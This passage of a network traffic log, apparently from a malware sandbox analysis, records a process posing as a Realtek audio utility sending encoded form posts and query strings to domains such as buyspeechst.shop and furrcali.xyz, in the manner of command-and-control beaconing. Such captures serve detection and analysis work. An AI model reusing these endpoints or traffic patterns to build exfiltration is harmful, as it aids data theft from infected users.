Jan 9, 2025 08:33:06.315635920 CET	5390	OUT	Data Raw: 47 37 42 35 44 53 55 6b 30 52 77 44 4b 67 69 39 73 47 69 30 59 43 50 74 56 7a 69 6e 37 46 47 38 4d 47 6c 34 65 37 31 45 52 41 31 50 34 46 44 4d 64 36 56 79 73 6f 51 61 56 73 43 70 4b 31 6a 79 32 54 73 65 4d 4c 7a 46 61 53 71 67 6f 5a 32 70 53 53 Data Ascii: G7B5DSUk0RwDKgi9sGi0YCPtVzin7FG8MGl4e71ERA1P4FDMd6VysoQaVsCpK1jy2TseMLzFaSqgoZ2pSS7jYmA1Ij0VYvip0IOro1HMYmtydfeFdTSRdnpZt3SsbsKXhtGhDcPpwR3UdZ/a8kp99rbUiGdLZw0VyUChxPPoEtPk6TaHAQvskgiViXCHXZsTD2ZtJYx256Nk7fiQmQxKjxQzALWslC6d9DIGInqL1NEQsC0+Bi3
Jan 9, 2025 08:33:08.504431963 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/k29t/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Thu, 09 Jan 2025 07:33:06 GMT Content-Length: 0 Connection: close
Jan 9, 2025 08:33:08.504868031 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/k29t/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Thu, 09 Jan 2025 07:33:06 GMT Content-Length: 0 Connection: close
Jan 9, 2025 08:33:08.532824993 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/k29t/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Thu, 09 Jan 2025 07:33:06 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.11.20	49757	103.106.67.112	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:09.019402027 CET	540	OUT	GET /k29t/?cOnShP=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:33:09.275846958 CET	639	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Location: https://www.furrcali.xyz/k29t/?cOnShP=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&NvA=qUwPQPTQmTwyizTU Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Thu, 09 Jan 2025 07:33:09 GMT Content-Length: 206 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 75 72 72 63 61 6c 69 2e 78 79 7a 2f 6b 32 39 74 2f 3f 63 4f 6e 53 68 50 3d 6d 4c 4d 34 4e 79 56 33 52 6d 37 4c 53 46 36 32 7a 71 33 71 70 73 73 73 42 31 46 37 6a 55 6b 66 6c 43 2f 63 77 58 39 58 78 39 65 44 51 42 4a 37 2f 67 4e 74 35 39 63 75 6a 67 4c 57 47 65 79 67 70 64 73 48 75 48 51 36 5a 54 31 6e 5a 45 65 45 36 41 7a 71 50 44 44 4d 52 6f 36 58 47 70 75 44 31 58 48 69 61 56 36 78 4f 6a 31 69 4a 2b 2f 30 5a 39 6a 54 34 59 67 3d 26 61 6d 70 3b 4e 76 41 3d 71 55 77 50 51 50 54 51 6d 54 77 79 69 7a 54 55 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.furrcali.xyz/k29t/?cOnShP=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&NvA=qUwPQPTQmTwyizTU">Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.11.20	49758	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:14.591558933 CET	811	OUT	POST /w98i/ HTTP/1.1 Host: www.buyspeechst.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.buyspeechst.shop Referer: http://www.buyspeechst.shop/w98i/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 72 52 6d 59 52 45 66 59 6a 55 34 4b 30 33 6e 2f 39 76 62 66 43 6a 35 71 49 6a 4b 6c 4f 46 31 62 7a 75 55 74 67 39 42 7a 7a 46 6b 30 49 7a 48 6b 6b 4f 45 4e 4d 70 2f 31 37 4b 58 4f 42 35 69 65 52 35 51 52 43 32 4a 75 6e 75 37 6e 4c 6f 37 50 67 66 38 64 38 30 73 79 6e 72 61 52 65 2f 49 67 47 64 6b 67 75 57 4c 38 38 71 57 62 70 31 56 4a 70 62 6d 43 43 75 6c 58 6d 6f 6e 48 68 41 63 49 51 53 30 74 32 42 4a 4f 77 6a 56 74 43 50 72 6b 4d 35 64 4a 36 37 4a 2f 2f 74 77 30 39 58 63 72 54 7a 2b 75 34 47 2f 36 63 6e 46 68 43 36 33 38 6c 6d 70 77 77 3d 3d Data Ascii: cOnShP=ZdYnZ6+WLY4YYrRmYREfYjU4K03n/9vbfCj5qIjKlOF1bzuUtg9BzzFk0IzHkkOENMp/17KXOB5ieR5QRC2Junu7nLo7Pgf8d80synraRe/IgGdkguWL88qWbp1VJpbmCCulXmonHhAcIQS0t2BJOwjVtCPrkM5dJ67J//tw09XcrTz+u4G/6cnFhC638lmpww==
Jan 9, 2025 08:33:15.037329912 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:33:14 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKUlHL683ELwzKqKjpRGIIactxbNF9BffdgXHiiG4vNJ0Magx0JHLDuuc9IBzbbgqkeYTIK4kQSyBqSB6YXhL5hFLlZZRdFF6n1Da9tTf%2B2AINp5JplvYc%2Fz7MjefJfxRCaKaGShqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bcee9e4f233a-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=119469&min_rtt=119469&rtt_var=59734&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
Jan 9, 2025 08:33:15.037341118 CET	223	IN	Data Raw: 64 39 0d 0a 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 Data Ascii: d9Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_+
Jan 9, 2025 08:33:15.037350893 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.11.20	49759	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:17.243159056 CET	831	OUT	POST /w98i/ HTTP/1.1 Host: www.buyspeechst.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.buyspeechst.shop Referer: http://www.buyspeechst.shop/w98i/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 64 31 43 54 65 55 75 6c 4a 42 32 7a 46 6b 6e 49 7a 43 67 6b 4f 54 4e 4d 6b 4b 31 2b 69 58 4f 42 39 69 65 51 4a 51 52 31 61 47 6f 6e 75 35 2f 37 6f 35 4c 67 66 38 64 38 30 73 79 6e 2f 30 52 65 6e 49 68 32 74 6b 69 4c 71 45 6e 63 71 5a 52 4a 31 56 44 4a 62 69 43 43 75 58 58 6b 63 42 48 69 34 63 49 55 43 30 73 6e 42 57 45 77 6a 54 67 69 4f 2b 33 4d 55 57 51 71 66 32 2f 66 34 73 31 4d 66 41 6a 6c 2b 6b 7a 4b 79 62 35 50 37 33 6c 79 44 66 2b 6e 6e 79 74 2b 76 34 57 36 32 32 52 4e 4a 4b 6e 52 33 4a 6c 52 30 57 46 31 73 3d Data Ascii: cOnShP=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4d1CTeUulJB2zFknIzCgkOTNMkK1+iXOB9ieQJQR1aGonu5/7o5Lgf8d80syn/0RenIh2tkiLqEncqZRJ1VDJbiCCuXXkcBHi4cIUC0snBWEwjTgiO+3MUWQqf2/f4s1MfAjl+kzKyb5P73lyDf+nnyt+v4W622RNJKnR3JlR0WF1s=
Jan 9, 2025 08:33:17.493297100 CET	1063	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:33:17 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hEMo1bE%2BkElHt67%2BiG1pSKYbKHMDRp5AHXEH54Y7GoxJstUTbTmboWL%2Fo3E%2BbW2y6V9oTmLUtpefzQ4cineuoMR4Qpb7twArEL7a7nRpgbqVpFqayGGCNPim44Kj1MsyruTezWvGYA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bcff2ad6233a-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=120208&min_rtt=120208&rtt_var=60104&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_+
Jan 9, 2025 08:33:17.493313074 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.11.20	49760	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:19.898442984 CET	2578	OUT	POST /w98i/ HTTP/1.1 Host: www.buyspeechst.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.buyspeechst.shop Referer: http://www.buyspeechst.shop/w98i/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 56 31 65 77 57 55 73 43 56 42 31 7a 46 6b 38 6f 7a 44 67 6b 50 52 4e 4d 73 52 31 2b 6e 69 4f 44 31 69 4d 6a 52 51 41 52 4f 47 37 48 75 35 6a 4c 6f 38 50 67 66 70 64 36 55 6f 79 6e 76 30 52 65 6e 49 68 30 46 6b 6c 65 57 45 6c 63 71 57 62 70 31 4a 4a 70 61 39 43 47 4b 74 58 6b 49 52 41 54 59 63 4a 30 53 30 75 52 31 57 48 51 6a 52 6c 69 50 39 33 4d 59 5a 51 71 54 63 2f 66 4e 37 31 4e 58 41 6e 44 72 50 69 34 2b 35 73 4f 4c 4a 36 32 54 43 31 6c 2f 43 71 63 66 62 66 4d 32 48 5a 63 39 4e 73 6a 4c 6e 67 7a 67 4b 45 6c 63 61 4a 2f 63 6d 6e 4b 6d 6c 61 7a 48 58 66 58 4f 45 55 45 44 76 6f 62 4c 51 75 45 2b 61 38 2f 59 36 36 4e 69 76 71 65 63 37 52 53 7a 64 33 78 6d 75 7a 6e 47 48 78 56 64 77 31 54 45 41 4e 74 71 4f 36 76 62 58 4b 38 72 64 58 53 72 52 51 4c 78 52 78 7a 51 48 2b 7a 32 72 6b 4e 6e 51 53 42 71 6f 51 68 36 65 51 43 2b 42 43 36 33 76 32 67 78 72 68 55 47 [TRUNCATED] Data Ascii: cOnShP=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4V1ewWUsCVB1zFk8ozDgkPRNMsR1+niOD1iMjRQAROG7Hu5jLo8Pgfpd6Uoynv0RenIh0FkleWElcqWbp1JJpa9CGKtXkIRATYcJ0S0uR1WHQjRliP93MYZQqTc/fN71NXAnDrPi4+5sOLJ62TC1l/CqcfbfM2HZc9NsjLngzgKElcaJ/cmnKmlazHXfXOEUEDvobLQuE+a8/Y66Nivqec7RSzd3xmuznGHxVdw1TEANtqO6vbXK8rdXSrRQLxRxzQH+z2rkNnQSBqoQh6eQC+BC63v2gxrhUG89mO33vCZGbDm22twbE0JwLM14pTTNS/E+rSLCPkSHZ35AsArdJlVOvJuZzqVBrQAfmuWlYOdWYCIRsKuqE8v1tat35UTBYrWf8MNgX5MlgnPG3PX7MFRHr7LBbVcuFDAJCGylAdHnhlCoJ6Ou8crU2PZihIzU4eFyUEx5EAVSQ5dalFrLO2oxRDJvaF3a5oBdF+e5Mq3SaHT2g9wYcyQArCSkOS+s5qygRJghOlZjR3n+WSgBr0hsrQIyq/Ua1i4lntQoqJDyUKoHWU9wCzoR2NXKSPnV3XK/eFxVpPN90Hp9hyxbW4ncdUtFAuS3qlB+RQMz1bys8gVfazOHZNzjfwGS2geZRqpgmnTvwK9El6KxOOiZ+13earDNuCC9IzkyxquA3YnhAs51ofJu3cwS4G4NEqmn8o3wwQIkQSahTcSspb6jow4kZ8LZqKtYDTKpx6wKlsV/wM3PkHGgb41gl5mkHJDShfvN/JMi4iuOAPE/4zEQt/x2ZuOr7lP/3geRoUSv+RVWA/gKjc3pStnif+vn+7jAhZKq3qCaStkmF09+LD0grMEPrj3gKij3BQKqLDAhHmSb09G/QsxBKLoh3qpL49Qzn3N55z1CkP93LIiIo9vVZgHX/1wpDwB4onCpWtfLTFiJ+DlrWceI+wgnVgJMnhiAPG4U [TRUNCATED]
Jan 9, 2025 08:33:19.898489952 CET	5402	OUT	Data Raw: 4d 53 58 57 37 6f 79 54 78 39 6b 63 75 69 53 4e 63 6f 41 64 35 2b 50 5a 4e 78 7a 30 34 33 62 71 74 36 66 66 53 77 34 43 54 4e 48 4d 62 7a 45 59 4d 6b 41 49 65 2b 6e 36 49 43 68 48 63 54 4f 79 6f 2f 64 69 56 37 77 6f 34 6a 4c 6f 31 43 45 63 30 6a Data Ascii: MSXW7oyTx9kcuiSNcoAd5+PZNxz043bqt6ffSw4CTNHMbzEYMkAIe+n6IChHcTOyo/diV7wo4jLo1CEc0jtyL1VnZZgz4CewQNWk7BftKEPOdedaGmAk6iQ22Vk4fEzsxzmCyqV/Dh84c/RSPZrFh/xC2bcejqtoDATXPyWAQmejm0/4DISD9PctIC/Fuf3krdmo/4mKV7XTxXyH36NOmC5fMTh4xxKR9gH6Ytq0JBI4A1hwWA9
Jan 9, 2025 08:33:20.202405930 CET	1057	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:33:20 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4d7HkROK0PpBZUiqET6ZYMvUcsSUe1z%2F%2BLK%2B%2FbdJ0fhU3kIPPrhYPWlX6mUVwkyop0eDXzxM9WNM5IoXMw%2BdzmsBa%2BxNzlRMUHFULc9eNIF8aRb65feLWHsKgcGjmmzAAf2uVu8VSw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bd0fc9c486d4-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=118903&min_rtt=118903&rtt_var=59451&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7980&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_
Jan 9, 2025 08:33:20.202415943 CET	16	IN	Data Raw: 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a Data Ascii: b+
Jan 9, 2025 08:33:20.202425957 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.11.20	49761	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:22.554100037 CET	544	OUT	GET /w98i/?NvA=qUwPQPTQmTwyizTU&cOnShP=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE= HTTP/1.1 Host: www.buyspeechst.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:33:22.888756037 CET	1077	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:33:22 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMgcwJnFrBAN4MHB0LUOTFf74kn6YHiBSZoNZU73imc8FiKtOJqaQObOyYIgFzwQ4GSnFvUEgl3K79bge%2FISS3hAghht8g%2Bq42p4JhzGLEMQ%2FRTshHoYhEzb9uWV8WP1UGReRhXjcg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bd2059f72a00-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=119228&min_rtt=119228&rtt_var=59614&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=544&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
Jan 9, 2025 08:33:22.888766050 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.11.20	49762	194.9.94.85	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:39.384263992 CET	538	OUT	GET /js1x/?cOnShP=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.milp.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:33:39.628113985 CET	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 09 Jan 2025 07:33:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
